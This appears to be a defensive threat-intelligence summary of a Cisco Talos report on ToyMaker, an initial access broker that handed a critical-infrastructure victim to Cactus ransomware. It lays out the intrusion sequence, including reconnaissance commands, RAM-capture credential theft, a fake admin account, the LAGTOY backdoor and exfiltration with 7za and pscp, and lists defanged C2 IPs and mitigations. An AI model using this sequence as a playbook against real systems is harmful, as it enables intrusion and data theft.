Full Report
Cisco Talos discovered a sophisticated attack on critical infrastructure by ToyMaker and Cactus, using the LAGTOY backdoor to orchestrate a relentless double extortion scheme.
Analysis Summary
# Threat Actor: ToyMaker
## Attribution & Identity
ToyMaker is identified as an Initial Access Broker (IAB) assessed with medium confidence to be financially motivated. They are known to operate in conjunction with secondary threat actors, specifically observed handing off access to the **Cactus** ransomware group.
## Activity Summary
ToyMaker specializes in gaining initial access to high-value organizations by exploiting vulnerable internet-facing systems. Their primary operation involves a rapid compromise sequence: initial access, reconnaissance, credential extraction, and deployment of a custom backdoor, followed by a lapse in activity before handing access to a secondary group. In the observed incident involving critical infrastructure, ToyMaker provided access to the Cactus ransomware group, who then proceeded with data exfiltration and deployment of ransomware.
## Tactics, Techniques & Procedures
- **Initial Compromise:** Exploiting known vulnerabilities in unpatched internet-facing servers.
- **Reconnaissance:** Performing rapid system and network discovery (`whoami`, `net user`, `ipconfig /all`, `nltest /domain_trusts`).
- **Credential Access:** Extracting credentials via memory capture using Magnet RAM Capture (`Magnet RAM Capture executable`). (T1003)
- **Persistence/Backdoor:** Deploying a custom backdoor named **LAGTOY**. (LAGTOY capability includes creating reverse shells and executing commands.)
- **Account Manipulation:** Creating a fake local user account ('support') and adding it to local administrator groups. (T1136)
- **Lateral Movement Preparation:** Establishing an SSH listener (`sshd.exe`) and downloading tools via an SFTP connection from another infected host.
- **Data Staging/Exfiltration:** Archiving data using 7za.exe (`7za.exe a`) and exfiltrating files using PuTTY’s SCP utility (`pscp.exe`). (T1048)
- **Tool Usage:** Leveraging dual-use tools like OpenSSH (sshd.exe, sftp-server.exe), PuTTY (pscp), and common forensics tools (Magnet RAM Capture).
## Targeting
- **Sectors:** Critical Infrastructure (as noted in the initial compromise scenario).
- **Geography:** Not explicitly detailed for ToyMaker's origins, but targeted a victim enterprise described as critical infrastructure.
- **Victims:** A specific critical infrastructure enterprise was compromised in 2023.
## Tools & Infrastructure
- **Malware families used:**
- **LAGTOY** (Custom backdoor)
- Potentially Metasploit shells (hashes provided, suggesting potential use or overlap).
- **Infrastructure (C2, domains, IPs - defang URLs):**
- **ToyMaker IOCs:**
- 209[.]141[.]43[.]37
- 194[.]156[.]98[.]155
- 158[.]247[.]211[.]51
- 39[.]106[.]141[.]68
- 47[.]117[.]165[.]166
- 195[.]123[.]240[.]2
- 75[.]127[.]0[.]235
- 149[.]102[.]243[.]100
## Implications
ToyMaker represents a significant threat as a specialized Initial Access Broker facilitating ransomware operations. Their methodology indicates a focus on rapid but limited activity (recon/credential theft) followed by a handover, suggesting they care only about monetizing the initial breach rather than long-term espionage. Their activity directly leads to subsequent devastating attacks by established ransomware groups like Cactus.
## Mitigations
- Prioritize patching and aggressively monitoring internet-facing servers to prevent the initial vulnerability exploitation.
- Deploy robust intrusion detection capabilities capable of identifying the tactics used for credential harvesting (e.g., Magnet RAM Capture execution) and file staging/exfiltration (e.g., 7za.exe, pscp.exe).
- Implement strict network monitoring to detect unusual SSH connections or the presence of the custom `LAGTOY` implant.
- Be aware of the activity pattern where initial access is brief, followed potentially by a multi-week lull before a secondary, more destructive actor (like Cactus) utilizes the stolen credentials.